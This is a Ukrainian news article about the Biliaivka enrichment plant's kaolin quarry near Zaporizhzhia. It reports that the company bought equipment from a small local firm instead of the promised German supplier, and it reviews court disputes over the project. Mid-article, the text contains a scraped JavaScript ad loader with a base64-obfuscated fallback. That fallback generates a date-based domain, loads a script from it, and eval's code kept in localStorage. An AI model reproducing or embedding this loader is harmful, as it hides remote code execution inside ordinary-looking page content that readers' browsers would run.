При будівництві каолінового кар’эра під Запоріжжям вирішили зекономити на якості обладнання

ТОВ “Біляївський збагачувальний комбінат” (далі — ТОВ “БЗК”), навколо якого вже протягом 6-ти років точиться судова тяганина по оскарженню його дозвільних документів, продовжує занурюватися у грунти Вільнянщини. У процесі при будівництві кар’єра представники ТОВ “БЗК” порушують власні декларовані обіцянки перед мешканцями громади.

“Акценту” стало відомо про черговий такий випадок. Цього разу мова йде про обладнання, яким будуть виконувати потенційно небезпечні роботи. Виявилося, що ТОВ “БЗК”  вирішили знехтувати обіцянками про “німецьку якість”, очевидно, на користь економії власних коштів.

Так, у підготовці до розробки каолінового родовища ТОВ “БЗК”  “прогрівали” місцевих мешканців повідомленнями про залучення до виробництва  “новітніх технологій” світового лідера компанії AKW Apparate + Verfahren GmbH. 

Прес-службу ТОВ “БЗК”, наприклад, цитували у газеті “Дніпровські вогні”, коли повідомлялося, що АKW розробили проект будівництва комбінату, а техніка їхнього виробництва буде працювати на ньому. Каолін — тобто Білу глину технології AKW  дозволяли б видобувати “відкритим способом”, без застосування вибухівки і хімічних матеріалів. 

Тоді громадян інформували про співпрацю з AKW власне самі топ-менеджери компанії: наводили успішні приклади власної роботи, запевняли у багаторічному досвіді на ринку. Такий підхід ТОВ “БЗК” до справи дійсно міг вплинути на думку багатьох мешканців, які заплющили очі на ризики і конфлікти навколо будівництва. 

Дозволи на будівництво каолінового кар’єру під Запоріжжям можуть “посипатися”: суд встав на захист прав власників землі

Зараз, коли вся увага і зусилля українців прикуті до подій на фронтах повномасштабної війни, викриваються нові факти про “турботливе” відношення ТОВ “БЗК” до власних обіцянок і екологічної обстановки в області. Якщо коротко, “новітнього” обладнання від AKW ТОВ “БЗК” зараз не закуповує. І це вже підтверджено документально рішенням Дніпровського окружного адміністративного суду.

Тут і з’являється ТОВ “ГТЗ Україна” — компанія з офісом у Дніпрі, яка на відміну від AKW не фігурувала у ЗМІ з гучними заявами про власні “якість і багаторічний досвід”, адже зареєстрована вона була у 2016 році. Конфлікт навколо БЗК тоді вже існував! “ГТЗ Україна” має статутний капітал лише у 50 тисяч гривень. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

“30 листопада 2021 року між ТОВ «ГТЗ Україна» та ТОВ «Біляївський збагачувальний комбінат» було укладено договір № 30/11-21Ю від 30.11.2021 року, відповідно до умов якого постачальник зобов`язується поставити продукцію покупцю, а покупець зобов`язується прийняти і оплатити продукцію, передбачену відповідними специфікаціями, які є невід`ємною частиною цього договору” — йдеться у тексті судового рішення.

Саме тоді було погоджено поставку обладнання для збагачення каоліну на суму 3 млн. 312 тис. грн. (в тому числі ПДВ — 552  тис. грн) для ТОВ “БЗК” від ТОВ ГТЗ “Україна”.  Таким чином БЗК провів “імпортозаміщення” на власному будівництві, залучивши ноунейм-виробника замість “світового лідера” галузі, як декларувалося раніше.

 Цікаво, що у судовому рішенні, яке ми згадали вище, і саме ТОВ “БЗК” характеризується як “ризиковий” у податковій складовій цього складного процесу. Що саме означає таке формулювання по відношенню БЗК, будівництво від якого є потенційно небезпечним для екологічної ситуації у всій Запорізькій області, ще належить з’ясувати.

Нагадаємо, у 2023 році все ще точаться судові справи навколо ТОВ “БЗК”. Активісти та громадськість, які протистоять будівництву кар’єра відстоюють свої порушені права у Верховному Суді, Запорізькому окружному, Третьому та Шостому апеляційних адміністративних судах.

Останнім часом громадськість почала отримувати рішення на свою користь, підтверджуючи незаконність цього шкідливого будівництва. Усі сили активістів та громадськості направлені на скасування дозвільних документів на будівництво у законний спосіб, тобто через суд. Почитайте останні матеріали “Акцента” про це: (adsbygoogle = window.adsbygoogle || []).push({});

Зроблено перший крок до визнання незаконною розбудову каолінового кар’єру під Запоріжжям (ФОТО)Дозволи на будівництво каолінового кар’єру під Запоріжжям можуть “посипатися”: суд встав на захист прав власників землі Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/pri-budivnitstvi-kaolinovogo-kar-era-pid-zaporizhzhyam-virishili-zekonomiti-na-yakosti-obladnannya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top